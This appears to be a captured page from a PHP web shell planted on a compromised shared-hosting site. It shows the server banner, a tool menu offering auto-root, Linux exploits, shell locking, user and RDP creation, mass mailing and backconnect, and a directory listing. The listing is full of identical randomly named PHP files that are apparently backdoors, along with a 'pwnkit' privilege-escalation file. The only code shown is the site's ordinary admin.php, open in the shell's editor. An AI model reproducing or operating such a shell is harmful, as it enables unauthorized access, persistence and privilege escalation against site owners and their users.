Linux webd002.cluster121.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.121.40.2 | : 216.73.216.88
Cant Read [ /etc/named.conf ]
7.2.34
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
letacommog /
letaweb /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwx---r-x
assets
[ DIR ]
drwx---r-x
background_images
[ DIR ]
drwx---r-x
bbclone
[ DIR ]
drwx---r-x
cache
[ DIR ]
drwx---r-x
css
[ DIR ]
drwx---r-x
fonts
[ DIR ]
drwx---r-x
framework
[ DIR ]
drwx---r-x
images
[ DIR ]
drwx---r-x
install
[ DIR ]
drwx---r-x
languages
[ DIR ]
drwx---r-x
php_config
[ DIR ]
drwx---r-x
protected
[ DIR ]
drwx---r-x
requirements
[ DIR ]
drwx---r-x
sample_images
[ DIR ]
drwx---r-x
scripts
[ DIR ]
drwx---r-x
update
[ DIR ]
drwx---r-x
websites
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw----r--
_functions.php
2.71
KB
-rw----r--
admin.php
1.54
KB
-rw----r--
amadcfck.php
760
B
-rw----r--
amhywpuk.php
760
B
-rw----r--
config.php
158
B
-rw----r--
crqylmnt.php
760
B
-rw----r--
db_config.php
284
B
-rw----r--
dba_config.php
317
B
-rw----r--
elazbwnk.php
760
B
-rw----r--
feqmwfhc.php
760
B
-rw----r--
fugveiqp.php
760
B
-rw----r--
global_functions.php
266
B
-rw----r--
gmjbtxmy.php
760
B
-rw----r--
gmyosgol.php
760
B
-rw----r--
gnnxfswk.php
760
B
-rw----r--
hosting_config.php
201
B
-rw----r--
index.php
71.52
KB
-rw-r--r--
install.php
378
B
-rw----r--
ipn.php
309
B
-rw----r--
izbcvwpg.php
760
B
-rw----r--
jaklzfte.php
760
B
-rw----r--
jytvfhlh.php
760
B
-rw----r--
log_config.php
207
B
-rw----r--
mail_config.php
274
B
-rw----r--
mainsite_config.php
332
B
-rw----r--
nfunjxer.php
760
B
-rw----r--
nkfngbxn.php
760
B
-rw----r--
odylxpbr.php
760
B
-rw----r--
oeaasuek.php
760
B
-rw----r--
olkycafm.php
760
B
-rw----r--
ovmpacym.php
760
B
-rw----r--
payment_config.php
252
B
-rw----r--
pwnkit
0
B
-rwx---r-x
rnqbcnev.php
272
B
-rw----r--
rqvfyjyf.php
760
B
-rw----r--
rzhyqmcf.php
760
B
-rw----r--
sadtbusf.php
760
B
-rw----r--
session_config.php
212
B
-rw----r--
stats.php
891
B
-rw----r--
sthumb.php
59.07
KB
-rw----r--
surnaryg.php
760
B
-rw----r--
svnjmvkg.php
760
B
-rw----r--
ugbidzzi.php
760
B
-rw----r--
version.php
36
B
-rw----r--
vtkfgfmv.php
760
B
-rw----r--
wkueddbh.php
760
B
-rw----r--
xgjcsyoq.php
760
B
-rw----r--
xjhwlihv.php
760
B
-rw----r--
xkfabdun.php
760
B
-rw----r--
xphdvzfz.php
760
B
-rw----r--
zwzvzhuf.php
760
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : admin.php
<?php require_once 'config.php'; require_once 'global_functions.php'; $domain = $_SERVER['HTTP_HOST']; if (isMainSite($domain)) { $is_installed = strlen($db_host); if(!$is_installed) header('Location:/install.php'); $config = dirname(__FILE__).'/protected/config/main.php'; Yii::setPathOfAlias('application_admin', dirname(__FILE__).'/admin'); Yii::setPathOfAlias('application_root', dirname(__FILE__)); Yii::setPathofAlias('site_app', dirname(__FILE__).'/admin'); Yii::setPathofAlias('bbclone_app', dirname(__FILE__).'/bbclone'); //try { include dirname(__FILE__).'/admin/classes/WebApplication.php'; $app = Yii::createApplication('WebApplication',$config); $app->isMainSite = true; $app->builderMode = true; $app->run(); //} // catch(Exception $e) { // echo $e->getMessage(); //} exit(); } $maindomain = extract_domain($domain); if (isMainSite($maindomain)) { $subdomain = extract_subdomains($domain); $mainSubdomain = $subdomain; $subdomains = explode('.', $subdomain); if (sizeof($subdomains) == 1) { $mainSubdomain = $subdomains[0]; } else { $mainSubdomain = $subdomains[sizeof($subdomains) - 1]; } if ($mainSubdomain == 'template') { $templateName = ''; $subdomain = array_slice($subdomains, 0, -1); $subdomain = implode('.', $subdomain); if (strlen($subdomain) > 0) { run($subdomain, 'template', 1, 0); exit(); } } else { run($subdomain, 'website', 1); } exit(); } run($domain, 'website', 1, 1);
Close